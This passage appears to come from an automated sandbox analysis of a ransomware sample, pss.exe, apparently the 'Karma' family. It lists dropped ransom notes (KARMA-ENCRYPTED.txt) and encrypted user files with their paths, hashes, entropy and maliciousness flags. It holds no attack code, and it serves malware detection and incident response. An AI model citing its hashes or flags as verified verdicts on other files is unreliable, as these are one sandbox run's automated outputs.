SHA-512:B745C75E75BEFBDA02AF5617E3968D98024CA3BE73C2F1DA98E7007647FCFD3210CCAA8E815BDEEE84A640B040FA1F2C2767FB9ECCA9C7803DC485C4E940A1A2
Malicious:true
Preview: .cz.N.,.l...X.nb.0...T.s...d...|8.a.I......@....xA.x.Rb/....KARMA.Ie......h.D..4......{.....).._)[.u.{.dH...2..3zJa...#.....:....C..D[C*.c..\}.......7...E...-yB.....).D.>...v....z.n.z...z.........)..g...\s.-......V.*.L4.N)u-.Vla.V.<.j.X...Mpi..p.G.l.....2..M.q$..Z..... 5WK.s@..e.O..7[.c.(..#&...........^..u.,.*..k.#.9..a.6..=....h...1.zd:..G...).*.;.F..=d`E.B5Q.....IQD.....i.a..P.E.E.A.r......G.t..s`g+.#..S$....oT.../x......~G..$.t...T.9..K....#.;...~#..' \.6..T.%.r.?....?}>a......2....).}d...q.*u...PJ...cC....jE..\.].....T.......*&....l.Esf.T./..G.Lr..$..8.....A.x._..N.Q.Y}.X!.%.v.*7.YA'.m.w.dN...n.!...._C|a.+D...H>!..8H.K..N.Xv.ANx...../` 3..a.....&.f#.bv;;.%...B..u...rfXjN....lV.Jh.z..j...M.#.)Q...QJ.*.Z.F1.8[L..Q..g.PfE.&........I. ...r.,.wx.P.a....t.....#;....<...........lL..X...9v....V..x......8L...p..P.8...V.../.Q....W.iI_W..mC.#eS.3......F...{t.b.X..nMPx.T/..5ZC.hUu....G.....|.....U..8.w..dG..{j..r.+....L.-...=.c.|bS..b..b.W...
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):89
Entropy (8bit):5.918321740242394
Encrypted:false
SSDEEP:3:+q1RGG6OOpsTWuP+0qgeFH+EjWCT1TZn:+WgtOO2TA02FTqOn
MD5:68132C15654BA5EF2B549D059197905A
SHA1:6068A786D8EE6092A3DC4753CC75B472395B8A0A
SHA-256:9A4CF16C5831D71583AB001304DCAE8D00B7C3D72DD53B55AFADBB5268864ACA
SHA-512:0404F84536F9E7C0138426FAEB9D797D1B1031F9CCAA1FA096CAC3E9A57B1C26941786CDE12370A774B757CE36D3DFE19D90E49DE3AB3FFA8BF8A27D2B4727F8
Malicious:false
Preview: ..XD.M.\..>P..}...#_.:#.K..'1......1...+....{.....i...SJ......KARMAm'6...F..,)..P...q.
C:\Users\user\AppData\Roaming\Microsoft\UProof\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Vault\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Word\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Contacts\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828524406961908
Encrypted:false
SSDEEP:24:daSZxA3anfv40RULHTpiwec06UmGdKaayO5/106xsqmqrG2OQ:daSZNfvEHTARc06iKaayuG6ujt2OQ
MD5:DF49D05C4F5896C23935E857901144C6
SHA1:873592CC55E5D3BF80D1F6A88118BDEF2FC2A1D5
SHA-256:DC071EB24D1EA3DCB891DE552AF16EB9171CC47619F61A0FD85D489504B25060
SHA-512:8B7B49A74568E9AB1D5C83E1B4774879F22EA31A4DDFC20F7D7B4C358094AA7DBCA2FB0EE8A9CA430FA41A2A85490ED33B302413885EE2E985D1F519E7306FE2
Malicious:false
C:\Users\user\Desktop\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.777045896477449
Encrypted:false
SSDEEP:24:2A7Y3u0jKZaXqdbQt4OTxJ+N4ThndhUu207KxZwjob3:tYvjKZa6BKj+NYrUJ07KF3
MD5:9D14749E0744BDD2900649AFEB8515C7
SHA1:3A31461658BF8D101129DB9E3E52CD171473E0BC
SHA-256:210452686AF3D20653C10952E2D8A49CED49137D754B5D9DF0D777DD92574C8F
SHA-512:316E6DF01F6DC9BD10B4C3ACAA9F80554A325007B893292A0D89F4181E1213BE9589CDD99E03DDC8DA74C41D39939BE164AE0DE4B540A17EDFCEDE901E921D78
Malicious:false
C:\Users\user\Desktop\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.792133753040234
Encrypted:false
SSDEEP:24:TUwxDgWdiPHdjNOyaQlXq7YOBsU8wOiHoMxlsqCMBzrWKIT:Awqy8OYXk8RFMxR5WKIT
MD5:B97349C71E967336930D9C60296EAE81
SHA1:8B6D5D425295C3172AAACE42FD162EBE3E3BB199
SHA-256:E64BE070F3EBF1262347D720B385F29F59332D6436DF022861CADA90D8A70C88
SHA-512:A99918694F6F6D8994C0922317C111383ACF49E3492D478DC65FDCDB6AAE61416806B4718AAC830C745359C37A62067E924706A150A9CFD24115B351E9FCB02C
Malicious:false
C:\Users\user\Desktop\BNAGMGSPLO\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\DUUDTUBZFW\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808408298574005
Encrypted:false
SSDEEP:24:i9gyeCSCVNPvQPzCXrzQykbDOEuxWw8aJwfi0zg:i9rfPILCYyADO4w8aCi08
MD5:7C3F64A08192EAAC0FE31FAD5F5FE17D
SHA1:294CB6345580378CAD00AD0FF735C71348D6C5E9
SHA-256:5408885F34B002A2BF7F62D1B640DEE2E5A83FEE27F1D608B2C27CB468E5F0ED
SHA-512:CDBBED517E7C0C3BD14D966C15E76482326371F0214D119B1041422973F250CE34AABCA26656EF00095A7BB186E8DDE628AB72C64452C5E7AABD311FDCAC6985
Malicious:false
C:\Users\user\Desktop\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.825390699299319
Encrypted:false
SSDEEP:24:fYj+1UAwKmdyUAS8I6E0V45yMuDdIi4BqaJr+WJAxIgOqp:fYjSU20yUAZp/yiS+NxImp
MD5:70B8753BB43F5B239F176592C6175819
SHA1:77D81D9BB7AFF498564555BD638A331B33F9FCC6
SHA-256:5CF6FEED893D7C145014012899C0A8CE929A392729B775E655C4E1B73DD0FBBD
SHA-512:7AADA4CEBE30E13E5E5A592FB604D85AFF978787D1E2D04FFDD05DAA114F51D7409A16CBD9BE502A7C62C493D2476D4E43B9EE574AD4726B5961E685EF8DA00D
Malicious:false
C:\Users\user\Desktop\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822077045349632
Encrypted:false
SSDEEP:24:r0WgD2WEXt0jLh/oZ+f6/d5E7+zpMmbv7kj/P3xOWp58t0Y:YWgTbjLe/rEyrDkpi0Y
MD5:18762232B1E12D3B57BF1672262F1C30
SHA1:AF05AF0017AE501FD7161016A193FA6A38994A1A
SHA-256:FD65251A41BA0D978B57AAEAB4BEBB9626950E4B21432190DEF47A13E17BC625
SHA-512:84A4C2047BA0A23BE3B65988AD8C9AD8E8B13CD5DC6E59070A4DB25A7ABC5A660E23B1765840D174EE8258CD8FDA605001E4483640FA6BFFC517DB382E2A8C39
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8026531878921945
Encrypted:false
SSDEEP:24:5g1h7d4FX6FJIcQaPDOZL6FpnuBKHyL6SXkMx6EWmpf6VS4:5gr7dcKFWcFKZLEnuBK1SXkMdWHU4
MD5:57E5A8A0B4D0F8ECB16D63E4F403411C
SHA1:C94126ACA4FB4642750D00B1977EF8448489BA77
SHA-256:418B82E5B2D93FF9A08989319EAA262EF6E63A540C2384F63953FAB6F208C36D
SHA-512:9DF0669F44697CA0BDF3D1E98FB159B72005957BDD3CBA26EB47E79FDE19557E8566F1E0AE66F4BFA62963F55BAAE4109D20C227E9D27010C2456B10A093B945
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829657089271315
Encrypted:false
SSDEEP:24:zNfCf5dN0hd+kQKdfu0TRYLdNH0wMjzg+c/:zBCfy3+bKdTaBNCjw
MD5:7574183793DD80CB429EA748740B526D
SHA1:6B9298AAA1EDA4AC76032FC24CAA7694B42CA8BD
SHA-256:4E78D6142409C842F363E1AA7838194E7EB3CDC5DF8BF2A27E5ACA4DE48A344A
SHA-512:0549B26883D00AE96296CFAF3C48BFB4F3BC6D97E224840847FDE7EE90C155422B712110501E53912E261B9DE8C12298650E8DF2AA98756A836DD21266750DE2
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82408303678608
Encrypted:false
SSDEEP:24:kgsFb9ZQBbePoZN/rTEu8xao0imBPDwMY9yqVWkxrAbYaH70TgIlXn4:kzJY+oZtbGj0/VkMY9H0kCEo0MB
MD5:C693F4348FB549A0E912F3519A2563CF
SHA1:6316781F0508ABF2E5EAC2AE0819E08938872154
SHA-256:F8566E49754FE3FCCC276504A9F0B4DD1F0C23C3D1826746D529CAE77B60DED4
SHA-512:8A3FA878108C9E3F55B44CC6CD41F20A6A05EF290ABAFEBA2072C4DA7EFFF2B9CDC7821EFEBB7FD3B6E65AF7C05517177A39EC8477AEC4659F31798D163673A6
Malicious:true
C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.848759370626013
Encrypted:false
SSDEEP:24:6ULzwc8GzlL3ZsPd1CGuwfZZJnHb0h25hPp5poVuqs6HfjnchtL9:6UHLppLSPd1iwfNAh23PpsVlsWEt5
MD5:2262A9AE75A2911F4C1DAA5AA1D07097
SHA1:28B74610BCD74B12E520BE708B0910C367274591
SHA-256:33AC5AE54DD113B3B4DD3845A80E9E69A91D5F13BE6B0D91C2204A5F39925155
SHA-512:369CD40E2BB761B3F68FF00E20AC3880C576802A8B1B0610AAF5A4BAAA98FD88AFC8689CB19D1F74B06C4C686E48B6591F2C8E5D6FE03567E24D0BDF56F6938A
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.781654596856385
Encrypted:false
SSDEEP:24:NiXlXg5YeFCyF0hrbmaQ1FcI6fQYNyKJ1f70DqmKNSBb:JeeFoG7X6jx1T0DhKoN
MD5:153CBBAD2A155368392A5A8D9234EAD3
SHA1:243184F53174C86794D968E18FF98852CFC7E516
SHA-256:929E64E4EF7BCC42B104589D007290CA58E25FBCF954173BF89FB656AB504562
SHA-512:02AFEDBD86BECCE6F2C766B33BD399FA1F13E4D416DB180F2FAE4EB2291257E0257A0F5B15B493EAD3527BCBCA8A0BB00B3013361E15850AFAE17A25A53942C5
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805283204109685
Encrypted:false
SSDEEP:24:90yusAP4kqgexgb5bwB6QIixSPi5hIJng36jvhgzihHEh:90y6usOB6QR55hIi3ITHEh
MD5:949F8A1383A7234D478A1346ED21B277
SHA1:38AAAF1A42B3C76277990B4468C36DE38A8383F3
SHA-256:6E2ED81A575E78973BFE4D465B81BBA33CAB8787F5DD5ED27B266DDB9A155DD6
SHA-512:720061A77EF9C26D893D7B9C2588362C5889A7EB1F06756EE72D7B2900F135AF044B72FD74BB34DA3FBC0E74CB9DD2DCDB08CC6D6066176EE5364E4CC838FB9B
Malicious:false
C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819085524610789
Encrypted:false
SSDEEP:24:sUA3KFlUtXrCsXOgoyIj/WyGxpu4SmIgOg5OIlwl6r:sUdlUtXrCsegoyIjupf1hls6r
MD5:2830897848C73689F8675CDC3EBE03FE
SHA1:AC4287CCD3BB12F3E742D76D5CA09D6C88EBDF96
SHA-256:FB76E0989C64FB44CD1F9992828259C37A49912A83337F521EDE9C9546B9CF60
SHA-512:8A903F19BE9C9E7A003FE8C7642A30BE2A30E10E03C9069EFD871422C05359E0139DAEFC215A4A97DDC708C46E5D4C23CE79197BBA62787658D1BB208475CA6B
Malicious:false
C:\Users\user\Desktop\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.794045729889145
Encrypted:false
SSDEEP:24:P3kR5g36plNhY2o7aFvqyAza+O0/ivbq6jsv/GKtHyrV:fWB/NEaFyyPx0/JSsv/GKt6V
MD5:6E0F01658FA8A0EDCEC14B83802F3AC1
SHA1:6BF831E63417E34526D9BB0C38D79A452FD57DC6
SHA-256:0873B2645758BFD356DC9FCE539B20FDB710E7E01DBC791CFD5930FF4C7EA80B
SHA-512:17C5BF442CF7B9B60A6EAB780610F86236EB4F55B8F3EC7C2002862012B162190088B15A8EF0E2CDE0649CE2A23E7E8716AD716A8B26741560830384402A427C
Malicious:true
C:\Users\user\Desktop\NYMMPCEIMA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8058274128306415
Encrypted:false
SSDEEP:24:gy1qVYxcJ4xYwQ3wvWRqM45pfGSQVfR1ZWJYN/XBQW5Uu4KH8RaC:S/rRwA43fjQVfKYt7U1KWf
MD5:8C94F123593C1EFDFEB0E2D80A570B90
SHA1:9A98EE225652380F456FC8AA01FA4103E0FFFD62
SHA-256:876232C6DBE6200C91625D68990C04EA673349AD9AA437D7C8BC05D8C4F1C7AF
SHA-512:54F68FF974542104CDED40B11A2187AB976A31EF031B92DF6B0DAF6B8BB0BF0E34D8BE5453248323CD0D5BF174803CC260909D67F3CF69A67380A5B44335C923
Malicious:false
C:\Users\user\Desktop\PIVFAGEAAV.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814709505401737
Encrypted:false
SSDEEP:24:pjxRzR/cl8GJDSEip0k62HDItLV7hxDBMCoul27:ptzGJPi2ktItN/DBMB
MD5:B00B584A51FCA2251D7F1C7958B054EF
SHA1:868EECB137351B8F7BFF8307A4757636DEAEF53F
SHA-256:02636A1FBFE2D7DCB4FF45F38DF2F9BBBEDBC6B00261681AA652A31E7A37DE66
SHA-512:AF523544F9297E8A051D3C1216CCC944DA915A8D450076839223272063EE30C279A265F6FE22886B22D0DB8A3130D30363E75ECDA9B5AB74313BD404E59710F8
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813496593107111
Encrypted:false
SSDEEP:24:KkeZeEHreiz/vxc3/utxsu/SKRzpQD/6YqpIK0mb9uDZh4880xm:he7SavmPwtqUGeYYIpmxAv4t0E
MD5:A205E562AC6B5C8B484AB016FCDA48EB
SHA1:902F5E3A73E26B1EE1D4758201276590EDADAB6E
SHA-256:42AA8EF0CF941B62D91C2447EB5EBCD8013E2EE4E5B5B892B384048F095A27C8
SHA-512:881554A6E9DB24FC8550E03AC51B4BC0D7A84D822ACAB4898DC579662E756345B48B488D9DAF743BD53949125CC9C77B55E5CFFB0FF97E7AD2367EE5FFF7610C
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8171099113409985
Encrypted:false
SSDEEP:24:5d4VGtLCaz2/NCa4kCFKW+ApqZki6M6N9BOg2SIjJbjrF2q03MHsJqX:lth2/NCOCvpuEMunxbmJ3rFNMYX
MD5:0794AA12560655EA0D1A26CF29B24E01
SHA1:485976A464B7362A6F19E9BDAED0BE2F79A53F20
SHA-256:07C5859268AEA636072CFB40517E3AFA9D56D6135EA6FD2A04AD84FAD72D2045
SHA-512:71C3EFA86A0E2959F2E2746056DC330EB7D8C2EE9FA959D2E6766274E5BC99A231B38FB0F9FD618B5CE3A044E50F4835369320127EF6473268D5A8CAB9FD3072
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812082298645967
Encrypted:false
SSDEEP:24:zHlAn+u02GZDxIk4G93zbVUHsODK6ZW/Nm+u:zlA+uT6D6k4mj6HZZW/0d
MD5:E7FC888E4C02A9C87CA616628478458C
SHA1:ABB92988C0027BCAB61A3F450AB23DD97F1BC305
SHA-256:A11A9A59F8E7B026407604E10C6CD045B4C83272310604067E5659CAAE3E33B8
SHA-512:6C29D80EF0EFBBD82872A2251741CFCB0247D75D6210B162C7F68FBAA0E215E9D6632B0A61B3025DA044834C527310D844CA2D62DBEE8D6185719D4C7D3CB72C
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814750325268285
Encrypted:false
SSDEEP:24:bEuOEjn5aUa7SpwFRC+VYtMR2XXC8QOBmbCvTMynVypXvt1VuLCfp:g3Et/kq+x8j+YTXVyp1R
MD5:9B6B985952E08B8F0B5743114B52E876
SHA1:124A9174AAB93FBCC846011CA90EEEC2A4EF23D9
SHA-256:4705E3B5138E3C946EB24D3AE4F096C229CCF38955B9D8D88CCEF5D0419950F7
SHA-512:1D3360758E5C672F9FC08A1A1002E5678CE04D3EC7F2E83390137AA02FC6D45740473EEFAEDA9FAA6A854FAB74B3DAE09152B6F233B904EAE1BED5ABD5B587B5
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.817306123264909
Encrypted:false
SSDEEP:24:ibdDsaS8XRKaGYuCqDdgGOQtL2CDQAbwvrqQ8PanZQi:0dDsaS8vGYuCMqQB2KQAdQ8oZN
MD5:13E280C28A34F5B5497905B4FB375793
SHA1:1CCCB7DC8B06C6C6B1FEB5541B9D8060A7D361E7
SHA-256:57DFA63D1974B1AE2A52623B716004CC2BBE200BA126354944F27B41583E02E8
SHA-512:ED80FBF58642E0CE1D471B0C9E46C7759E11252F53C54F6AB4F1926D3A4B6445008846E6D93CE6922C9F12F8B9DE313D15F90D9E612D8DFA67E8C192FC9AB379
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832821038591339
Encrypted:false
SSDEEP:24:DXoR2+K0WEH7nEvzafJGI7KDGjVVIYOq1Wpnt6k9hB4CJKhYXlF:k53B7Ev2G7DGxlJPkbB4CJKKH
MD5:1973B01FB305EA4D713B78494611E6E4
SHA1:0973C43CE62C784456C3AF6D76F7BBE7DC0783A9
SHA-256:8BAA63935DEE483E1A2F866D40E14B264558AAF01F1EAEE329C47ED391BC6BF7
SHA-512:D6D655D524D4401799CA5EF3A268B4B37272B12FDC22D9FB9C8AE45075F6E803640484F19D5F0F03F789D71810328FC7345C891E549AE275FCFC0F86688EF9F6
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822508114103896
Encrypted:false
SSDEEP:24:EpdJ6rZ/1S629p1MDGuul2lvhTpoUE6M0CkY7ykcD:Epz6rqdz1M82lvhTpUkY7u
MD5:6C760643E8596CC1A14C377C6BCDB385
SHA1:6D736740E73199DD2EA270F7FD4B3B991F9B2017
SHA-256:D1A707297AC0953110B9E23DECDA8370478CE5997F188FF5232BA3797F937DAD
SHA-512:3B80A474B388DB9FAB8AF1ECD289FBAD2082A1FE83A22806C6D43A608B5870DC70ED6C2BF6DA664435E6F5D9EEA6587A94515008BA283FB16925A200AE918DC7
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
